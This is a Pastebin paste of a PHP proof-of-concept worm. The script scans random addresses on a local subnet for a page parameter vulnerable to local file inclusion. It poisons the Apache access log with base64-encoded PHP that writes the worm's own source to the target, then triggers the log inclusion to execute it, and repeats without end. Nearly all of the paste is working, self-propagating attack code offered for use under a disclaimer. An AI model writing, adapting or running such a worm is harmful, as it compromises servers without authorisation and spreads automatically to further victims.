API tools faq
paste
Advertisement
Madmouse

Php log worm POC

Madmouse
Jun 3rd, 2015
305
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.22 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // ----------------------------------------------------------------------------
  3. // "THE BEER-WARE LICENSE" (Revision 43):
  4. // <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
  5. // can do whatever you want with this stuff. If we meet some day, and you think
  6. // this stuff is worth it, you can buy me a beer in return Aaron R. Yool
  7. // ----------------------------------------------------------------------------
  8. // DISCLAIMER:
  9. // I MadMouse (Aaron R. Yool), am not responsible for the misuse of, (or any use thereof)
  10. // of this software. Use this software at your own risk, and do not blame me for your
  11. // stupidity, as I am not responsible for the actions taken by others. I have my own
  12. // stupidity to be responsible for. lol
  13.    
  14. function scan_for_life()
  15. {
  16.     while(true)
  17.     {
  18.         $host = "192.168.1.".rand(1,255);
  19.         $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
  20.         if ($socket === false) continue;
  21.         else
  22.         {
  23.             fwrite($socket, "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
  24.             $response = stream_get_contents($socket);
  25.             if(strpos($response,"HTTP/1.1 404 Not Found") !== false)
  26.             {
  27.                 fclose($socket);
  28.                 continue;
  29.             }
  30.             elseif(strpos($response,"Not Found") !== false)
  31.             {
  32.                 fclose($socket);
  33.                 continue;
  34.             }
  35.         }
  36.         fclose($socket);
  37.         break;
  38.     }
  39.     echo "Host: ".$host." under fire.\n";
  40.     return $host;
  41. }
  42.  
  43. function send_payload($host)
  44. {
  45.     $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
  46.     if ($socket === false) return false;
  47.     fwrite($socket, "GET /<?php file_put_contents('logwrm.php',base64_decode('".base64_encode(php_strip_whitespace("logwrm.php"))."'));exec(base64_decode('".base64_encode("php logwrm.php > /dev/null &")."')); ?> HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
  48.     fclose($socket);
  49.     return true;
  50. }
  51.  
  52. function run_payload($host)
  53. {
  54.     file_get_contents("http://".$host."/index.php?page=/var/log/apache2/access.log");
  55. }
  56.  
  57. while(true)
  58. {
  59.     echo "\nScanning for a victim\n";
  60.     $victim = scan_for_life();
  61.     sleep(1);
  62.     echo "Sending payload\n";
  63.     if(!send_payload($victim)) continue;
  64.     sleep(1);
  65.     run_payload($victim);
  66.     echo "PWNED!!!\n";
  67. }
  68.  
  69. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!